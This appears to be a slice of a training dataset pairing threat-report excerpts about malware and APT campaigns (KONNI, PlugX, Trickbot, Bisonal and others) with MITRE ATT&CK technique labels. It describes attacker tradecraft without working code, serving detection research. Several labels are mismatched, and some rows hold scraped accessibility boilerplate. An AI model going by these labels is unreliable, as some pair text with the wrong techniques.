| 991 | The first evidence of its intrusion dated from May 6, 2015 but activity appeared to have begun in earnest on May 12. The attackers appeared to be interested in one division of the ministry that is responsible for relations with the Asia-Pacific region. They attempted to extract all Word documents stored on a file server belonging to this division by bundling them into a RAR archive by running the following command | ['T1039 - Data from Network Shared Drive', 'T1083 - File and Directory Discovery'] | fine_tune |
| 992 | Talos has discovered an unknown Remote Administration Tool that we believe has been in use for over 3 years. During this time it has managed to avoid scrutiny by the security community. The current version of the malware allows the operator to steal files, keystrokes, perform screenshots, and execute arbitrary code on the infected host. Talos has named this malware KONNI. Throughout the multiple campaigns observed over the last 3 years, the actor has used an email attachment as the initial infection vector. They then use additional social engineering to prompt the target to open a .scr file, display a decoy document to the users, and finally execute the malware on the victim's machine. The malware has evolved over time | ['T1082 - System Information Discovery'] | fine_tune |
| 993 | While historically TA416 has delivered Zip files from cloud hosting providers containing a decoy file, legitimate PE file, a DLL loader, and a PlugX malware configuration DAT file, recent campaigns used a different tactic. Proofpoint researchers noted that the malicious Zip files delivered from DropBox now contain a rudimentary executable which is a dropper malware. This malware establishes persistence for a legitimate executable file used in DLL search order hijacking, as well as initiates the download of four components. These components are included below and resemble the components used in the past to install PlugX malware. Public research has previously documented TA416’s propensity for including PlugX Trident Loader components and decoy in the initial delivered Zip file. The method of installing PlugX via DLL Search Order hijacking that displays a PDF decoy remains constant | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 994 | uid= and writes a JSS Loader binary to %TEMP%\PaintHelper.exe. JSS Loader, which has both .NET and C++ versions, has multiple capabilities, including the ability to load additional executables, PowerShell (PS) and JavaScript (JS) files | ['T1059.007 - Command and Scripting Interpreter: JavaScript', 'T1105 - Ingress Tool Transfer', 'T1059.001 - Command and Scripting Interpreter: PowerShell'] | fine_tune |
| 995 | The actor behind Bisonal is clearly motivated and has an interest in Russian, Korean and Japanese victims. The development of Bisonal has been active for more than a decade. However, specific functions are still used today, many years after the original implementation of the Bional malware. Even if Bisonal could be considered as simple with less than 30 functions, it has spent its life targeting sensitive entities in both the public and private sectors. For example, in one campaign they put the domain name of the C2 server in plaintext in the malware which had the function to generate a non-ASCII string for the C2 servers once decoded. In this condition, the malware cannot work on the compromised system. With this investigation and the analysis of this decade of activity, we hope to force this actor to innovate by providing a better understanding of his arsenal and more specifically how Bisonal works | ['T1140 - Deobfuscate/Decode Files or Information'] | fine_tune |
| 996 | Figure 5: Registry Activity The script then determines the version of Powershell that is being used on the infected system. This is essentially the WMI equivalent of a registry-based run key from a persistence perspective. The Stage 3 malware is by default set to run 'onidle' after 30 minutes | ['T1012 - Query Registry'] | fine_tune |
| 997 | TA505 briefly distributed the Kegotip information stealer in April 2017. Across two campaigns of several million messages each, the actor used both macro-laden Microsoft Word documents and zipped VBScript attachments to install the Trojan on potential victim PCs. Kegotip is an infostealer (credentials and email addresses) used to facilitate other crimeware activities. It steals credentials from various FTP clients, Outlook, and Internet Explorer. It also will gather email addresses scraped from files stored on the computer. This information can be used to facilitate future spam campaigns by the perpetrator or may be sold to other actors | ['T1555.003 - Credentials from Password Stores: Credentials from Web Browsers', 'T1552.001 - Unsecured Credentials: Credentials In Files'] | fine_tune |
| 998 | Note: see the appendix for a list of the domains, file names, and malware MD5 hash values used to facilitate this activity | ['T1027.003 - Steganography'] | fine_tune |
| 999 | Register as a startup program in HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run if it has no privileged (Figure 6). Otherwise, it will register itself as a system service (Figure 7 | ['T1543.003 - Create or Modify System Process: Windows Service'] | fine_tune |
| 1000 | The two resources that contain commands that ISMInjector uses for persistence are named “Tsk1” and “Tsk2”. The specific commands within each of these resources are within Table 1. At a high level, the“Tsk1” command creates a scheduled task named “ReportHealth” that is meant to run a payload saved to "%localappdata%\srvHealth.exe” every 4 minutes. The “Tsk2” command creates a scheduled task that runs every 2 minutes that is responsible for saving the payload to srvHealth.exe. This task saves the payload to this location using the “certutil” command to decode the original payload saved to “srvBS.txt | ['T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1140 - Deobfuscate/Decode Files or Information'] | fine_tune |
| 1001 | Stage2.exe is a downloader for a malicious file corrupter malware. Upon execution, stage2.exe downloads the next-stage malware hosted on a Discord channel, with the download link hardcoded in the downloader. The next-stage malware can best be described as a malicious file corrupter | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 1002 | PLEAD also dabbled with a short-lived, fileless version of their malware when it obtained an exploit for a Flash vulnerability (CVE-2015-5119) that was leaked during the Hacking Team breach | ['T1203 - Exploitation for Client Execution'] | fine_tune |
| 1003 | This technique to hijack control flow has also been used by other sophisticated attackers such as FinFisher. Lazarus has also used other novel methods to execute shellcode such as by using the function EnumSystemLocalesA as a callback to shellcode written to executable heap | ['T1027 - Obfuscated Files or Information', 'T1106 - Native API'] | fine_tune |
| 1004 | APT34 uses a mix of public and non-public tools, often conducting spear phishing operations using compromised accounts, sometimes coupled with social engineering tactics. In May 2016, we published a blog detailing a spear phishing campaign targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware. The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 | ['T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell'] | fine_tune |
| 1005 | The Cannon Trojan is written in C# and functions primarily as a downloader that relies on emails to communicate between the Trojan and the C2 server. To communicate with the C2 server, the Trojan will send emails to specific email addresses via SMTPS over TCP port 587 | ['T1041 - Exfiltration Over C2 Channel'] | fine_tune |
| 1006 | The encryption style does not differ significantly from other prominent ransomware families. WastedLocker will attempt to encrypt files on local as well as remote (network adjacent and accessible) and removable drives. Once the eligible drives are located, the ransomware will begin the encryption process | ['T1120 - Peripheral Device Discovery'] | fine_tune |
| 1007 | It implements a simple custom-built virtual machine mechanism that will execute an embedded bytecode to decode and inject the payload into memory | ['T1027.002 - Obfuscated Files or Information: Software Packing'] | fine_tune |
| 1008 | The macro then creates a scheduled task named SecurityAssist that runs after waiting one minute. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. The Trojan extracts and loads this embedded assembly by concatenating the contents of two resources named S1 and S2 and decompresses the resulting data using the GZipSteam class | ['T1140 - Deobfuscate/Decode Files or Information'] | fine_tune |
| 1009 | Tonto Team is an APT group active since at least 2009 and targeting governments and institutions mostly based in Russia, Japan and Mongolia. For more than ten years, Tonto Team has been using the Bisonal RAT. Tonto Team is one of the APT groups that now has access to the ShadowPad backdoor | ['T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1505.003 - Server Software Component: Web Shell', 'T1105 - Ingress Tool Transfer'] | fine_tune |
| 1010 | The Bazar loader files are dual-extension executable files (such as PreviewReport.DOC.exe) signed with fake certificates such as VB CORPORATE PTY. This is consistent with the Trickbot group, which notoriously abuses the trust of certificate authorities by using signed loaders and malware to evade security product detection | ['T1036.007 - Masquerading: Double File Extension'] | fine_tune |
| 1011 | To operate and evade standard analysis tools, most of the functions are hashed. The hashing algorithm has a high degree of similarity to the previous ShellTea version, with a slight modification of the seeds and constants. In this version, the attacker also utilizes functions from ole32 for stream processing | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 1012 | While the URI string has changed from Trickbot and Anchor variants, the phishing tactics and use of post-infection reconnaissance commands remains the same. In the Bazar backdoor, the tag (or gtag) used to identify Trickbot campaigns is removed from C2 URIs. It may have been moved to the cookie HTTP header parameter | ['T1071.001 - Application Layer Protocol: Web Protocols'] | fine_tune |
| 1013 | Later in the execution chain, the SeLoadDriverPrivilege is used to load the extracted driver. Then one of the four drivers is dropped, after which the Volume Shadow Copy (VSS) service – which allows backups to be performed – is stopped | ['T1490 - Inhibit System Recovery'] | fine_tune |
| 1014 | In addition to loading the communications module, the initial macro described above configures a persistence mechanism for this malware loader by setting up a Registry Run key. The non-concatenated command included in the macro that establishes persistence for Libcurl.dll and the hash for this sample are included below | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'] | fine_tune |
| 1015 | As part of the exploitation process, the above value will be written to the registry under the %windir% variable, and deleted after execution | ['T1112 - Modify Registry'] | fine_tune |
| 1016 | The document contains an encoded Visual Basic Script (VBScript) typical of previous Carbanak malware. Recent samples of the malware have now included the ability to use Google services for command-and-control (C&C) communication. The module is base64 encoded inside the main VBScript file along with various other VBScript modules used by the malware. When we analyzed the script we noticed that it is capable of using Google services as a C&C channel. Abusing Google for C&C communication . The "ggldr" script will send and receive commands to and from Google Apps Script, Google Sheets, and Google Forms services. It is unlikely that these hosted Google services are blocked by default in an organization, so it is more likely that the attacker will establish a C&C channel successfully. Upon the first attempt to contact the hard-coded Google Apps Script URL with the user's unique infection ID, the C&C will state that no spreadsheet currently exists for the user. The malware will then send two requests to another hard-coded Google Forms URL which will result in the creation of unique Google Sheets spreadsheet and Google Form IDs for the victim. The second time the Google Apps Script is requested, the C&C will return the unique Google Sheet and Google Form ID values: The "entry" value is also a unique ID which is sent with each subsequent Google Forms C&C request. Using Google as an independent C&C channel is likely to be more successful than using newly created domains or domains with no reputation | ['T1102.002 - Bidirectional Communication'] | fine_tune |
| 1017 | Operation North Star C2 infrastructure consisted of compromised domains in Italy and other countries. Compromised domains belonged, for example, to an apparel company, an auction house and printing company. These URLs hosted malicious DOTM files, including a malicious ASP page | ['T1608.001 - Upload Malware'] | fine_tune |
| 1018 | The installer looks legitimate and has a valid digital signature from Sectigo (Obtain Capabilities: Digital Certificates [T1588.004]). The signature was signed with a code signing certificate purchased by the same user as the SSL certificate for jmttrading[.]org (Obtain Capabilities: Code Signing Certificates [T1588.003]). The MSI Installer asks the victim for administrative privileges to run (User Execution: Malicious File [T1204.002 | ['T1588.004 - Digital Certificates'] | fine_tune |
| 1019 | These platforms are used to exfiltrate documents and receive instructions. Here is a list of the platforms used by this variant: Twitter, Yandex and Mediafire. The tokens for each platform are hardcoded within the sample | ['T1102.002 - Bidirectional Communication'] | fine_tune |
| 1020 | Taken together, the VirusTotal submissions of the samples, the samples themselves, the ZIP containing the samples (observed as a dissemination mechanism via email attachment), as well as the RAR container (seen later in this report under the Analysis section) form a timeline beginning on 12 November | ['T1566.001 - Phishing: Spearphishing Attachment'] | fine_tune |
| 1021 | HAWKBALL is a backdoor that attackers can use to collect information from the victim, as well as to deliver payloads. HAWKBALL is capable of surveying the host, creating a named pipe to execute native Windows commands, terminating processes, creating, deleting and uploading files, searching for files, and enumerating drives | ['T1059.003 - Command and Scripting Interpreter: Windows Command Shell'] | fine_tune |
| 1022 | The malware proceeds to check to see if the original dropped malware file exists. In the event it does, Reaver will move this file to ‘%TEMP%\~FJIOW.tmp’ and delete this new file. This simply acts as cleanup to ensure original file artifacts no longer reside on the infected machine. Reaver will then install itself as a service in the event it is running with SeDebugPrivilege privileges. Reaver continues to collect various information from the victim machine, including the following | ['T1070.004 - Indicator Removal on Host: File Deletion'] | fine_tune |
| 1023 | The malware sample contains some interesting static artifacts including self-signed digital certificates used to sign the executable purporting to be software from the Foxit Software Incorporated company based in California | ['T1553.002 - Code Signing', 'T1553.002 - Code Signing'] | fine_tune |
| 1024 | The two-stage malware overwrites the Master Boot Record (MBR) on victim systems with a ransom note (Stage 1). The MBR is the part of a hard drive that tells the computer how to load its operating system | ['T1561.002 - Disk Structure Wipe'] | fine_tune |
| 1025 | Several files are created by Carbon to keep logs, tasks to execute and configuration that will modify the malware’s behavior | ['T1053.005 - Scheduled Task/Job: Scheduled Task'] | fine_tune |
| 1026 | The Distributed Transaction Coordinator (DTC) service coordinates transactions that update two or more transaction-protected resources, such as databases, message queues, files systems, and so on. These transaction-protected resources may be on a single computer or distributed across many networked computers | ['T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1036.005 - Masquerading: Match Legitimate Name or Location', 'T1036.005 - Masquerading: Match Legitimate Name or Location'] | fine_tune |
| 1027 | Seedworm then uses open-source tools such as LaZagne and Crackmapexec to obtain Windows authorization credentials. Seedworm uses off-the-shelf, unmodified versions of these tools as well as custom-compiled variants which we have determined are only used by this group | ['T1552.001 - Unsecured Credentials: Credentials In Files', 'T1555.003 - Credentials from Password Stores: Credentials from Web Browsers'] | fine_tune |
| 1028 | Initial access via a phishing email that linked to a google docs page that enticed the user to download a report, which was a Bazar Loader executable file instead Report-Review20-10.exe | ['T1566.002 - Phishing: Spearphishing Link'] | fine_tune |
| 1029 | Stage2.exe is a downloader for a malicious file corrupter malware. Upon execution, stage2.exe downloads the next-stage malware hosted on a Discord channel, with the download link hardcoded in the downloader. Once executed in memory, the corrupter locates files in certain directories on the system with one of the following hardcoded file extensions | ['T1102 - Web Service'] | fine_tune |
| 1030 | The encrypted request includes a PC identifier and timestamp, and optionally some other data. It is worth noting that the RC2FM module uses a number of encryption methods (variations of a simple XOR encryption routine), unlike the other InvisiMole parts | ['T1140 - Deobfuscate/Decode Files or Information'] | fine_tune |
| 1031 | In these cases, the temporary file is written to the %TEMP% directory, and the filename is a combination of numbers generated from a call to GetTickCount and the '.dat' extension (e.g | ['T1218.011 - Signed Binary Proxy Execution: Rundll32'] | fine_tune |
| 1032 | In the past, this APT has relied on Hangul Office documents (hwp files) to target victims, as it’s software that’s commonly used in South Korea. However, in this blog we describe an interesting alternative method, delivered via self-decoding VBA Office files | ['T1566.001 - Phishing: Spearphishing Attachment'] | fine_tune |
| 1033 | Post-compromise, APT39 leverages custom backdoors such as SEAWEED, CACHEMONEY, and a unique variant of POWBAT to establish a foothold in a target environment. Internal reconnaissance has been performed using custom scripts and both freely available and custom tools such as the port scanner, BLUETORCH | ['T1059 - Command and Scripting Interpreter', 'T1046 - Network Service Discovery'] | fine_tune |
| 1034 | Snippets of HOLMIUM PowerShell backdoor (POWERTON) implementing two different persistence mechanisms: WMI event subscription (T1084) and Registry run keys or Startup folder (T1060 | ['T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'] | fine_tune |
| 1035 | 1) Hunting for PDF files that are created with the same “DocumentID” management metadata field result in a set of files that have been used in email delivery against banking entities. 2) All of the PDF files embed a link based on a Google redirect, leading to the download of a Microsoft Office document file. 3) The Microsoft Office document files contain macros for code execution. Those macros match the characteristics of the builder that we have characterized | ['T1204.002 - User Execution: Malicious File', 'T1204.001 - Malicious Link'] | fine_tune |
| 1036 | The ZIP archive contains a malicious portable executable (PE) file with embedded HTML application (HTA). The user has to unzip the archive and double-click the executable for the infection chain to continue. The PE file is a simple HTA script compiled into an executable. When the user double-clicks the executable, the malicious HTA file is extracted to %temp% and executed by mshta.exe | ['T1218.005 - Signed Binary Proxy Execution: Mshta', 'T1204.002 - User Execution: Malicious File'] | fine_tune |
| 1037 | The two dropped artifacts – a payload DLL and a Word document – are written to the “Users\<Log on User>\” folder (the document will replace the opened malicious document with clean stub after killing the running Word process | ['T1059.005 - Command and Scripting Interpreter: Visual Basic'] | fine_tune |
| 1038 | Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. CTU researchers identified two versions of Daserf written in Visual C and Delphi. Datper uses an RC4-encrypted configuration to obfuscate HTTP traffic. xxmm (also known as Minzen) — This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. RarStar HTTP POST request. Use malware to upload the large list of enumerated files to the C2 server. When exfiltration is complete, the uploader (or Datper or xxmm) immediately uses the del command to delete the RAR archives. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity | ['T1573.001 - Symmetric Cryptography'] | fine_tune |
| 1039 | 1) Suckfly's first step was to identify a user to target so the attackers could attempt their initial breach into the e-commerce company's internal network. We don't have hard evidence of how Suckfly obtained information on the targeted user, but we did find a large open-source presence on the initial target. 2) On April 22, 2015, Suckfly exploited a vulnerability on the targeted employee's operating system (Windows) that allowed the attackers to bypass the User Account Control and install the Nidiran back door to provide access for their attack. 3) After the attackers successfully exploited the employee’s system, they gained access to the e-commerce company's internal network. With the account credentials, the attackers were able to access the victim's account and navigate the internal corporate network as though they were the employee. 4) On April 27, the attackers scanned the corporate internal network for hosts with ports 8080, 5900, and 40 open. Ports 8080 and 5900 are common ports used with legitimate protocols, but can be abused by attackers when they are not secured. It isn't clear why the attackers scanned for hosts with port 40 open because there isn't a common protocol assigned to this port. Based on Suckfly scanning for common ports, it’s clear that the group was looking to expand its foothold on the e-commerce company's internal network. 5) The attackers’ final step was to exfiltrate data off the victim’s network and onto Suckfly’s infrastructure | ['T1046 - Network Service Discovery'] | fine_tune |
| 1040 | Step 6: After obtaining the fully privileged handle of Taskmgr.exe, the actor uses this handle to execute cmd as high privilege process to execute install.bat | ['T1218.011 - Signed Binary Proxy Execution: Rundll32', 'T1134.004 - Access Token Manipulation: Parent PID Spoofing'] | fine_tune |
| 1041 | The threat actors can execute remote commands by running this specialized module with predefined actions. This module attempts to execute a command. It uses the PowerShell Invoke-Expression method for the PowerShell-based module, while its C# implementation has both cmd and PowerShell options | ['T1059.003 - Command and Scripting Interpreter: Windows Command Shell'] | fine_tune |
| 1042 | OFF ON Vision Impaired Profile Enhances website's visuals This profile adjusts the website, so that it is accessible to the majority of visual impairments such as Degrading Eyesight, Tunnel Vision, Cataract, Glaucoma, and others. This website utilizes various technologies that are meant to make it as accessible as possible at all times. We utilize an accessibility interface that allows persons with specific disabilities to adjust the website’s UI (user interface) and design it to their personal needs. This application remediates the website’s HTML, adapts its functionality and behavior for screen-readers used by blind users, and for keyboard functions used by individuals with motor impairments. In this process, we provide screen-readers with meaningful data using the ARIA set of attributes. It will also extract texts embedded within the image using an OCR (optical character recognition) technology. Vision Impaired Profile: this profile adjusts the website so that it is accessible to the majority of visual impairments such as Degrading Eyesight, Tunnel Vision, Cataract, Glaucoma, and others. Additional UI, design, and readability adjustments . 1) Font adjustments – users can increase and decrease its size, change its family (type), adjust the spacing, alignment, line height, and more. 7) Additional functions – we allow users to change cursor color and size, use a printing mode, enable a virtual keyboard, and many other functions. Still, we are continually improving our accessibility, adding, updating, improving its options and features, and developing and adopting new technologies | ['T1059.003 - Command and Scripting Interpreter: Windows Command Shell'] | fine_tune |
| 1043 | In another engagement, we observed the adversary using Mimikatz (the official signed version) to access credentials for logon (T1003.001: LSASS Memory | ['T1003.001 - OS Credential Dumping: LSASS Memory'] | fine_tune |
| 1044 | MobileOrder starts by registering itself as device administrator so that a normal user cannot uninstall it by simply clicking “uninstall” in settings | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 1045 | A screen capture of Trickbot’s code that is structured to steal passwords from popular web browsers . It should be noted that this Trickbot variant is not capable of stealing passwords from third-party password manager applications. Screen capture of code showing possible SMB communication . networkDll32 Trickbot uses this encrypted module to scan the network and steal relevant network information. Emotet, according to previous research by Brad Duncan, is also responsible for delivering this password-grabbing Trickbot variant, as well as Azorult, to users. It's also used to inject code into its target processes using the Reflective DLL Injection technique. James’s Place Bank, and Royal Bank of Scotland, and will redirect users to fake phishing websites. Trickbot’s other notable tricks . Trickbot is usually sent via malicious spam campaigns. Defending against Trickbot’s tricks: Trend Micro solutions . Malware authors continue to update banking trojans like Trickbot and Emotet with new modules that make it more difficult to detect and combat. Users can also use shortcuts such as “M” (menus), “H” (headings), “F” (forms), “B” (buttons), and “G” (graphics) to jump to specific elements.Note: This profile prompts automatically for keyboard users. This application remediates the website’s HTML, adapts its functionality and behavior for screen-readers used by blind users, and for keyboard functions used by individuals with motor impairments. Assistive technology and browser compatibility . We aim to support as many browsers and assistive technologies as possible, so our users can choose the best fitting tools for them, with as few limitations as possible | ['T1185 - Browser Session Hijacking'] | fine_tune |
c4ch3c4d3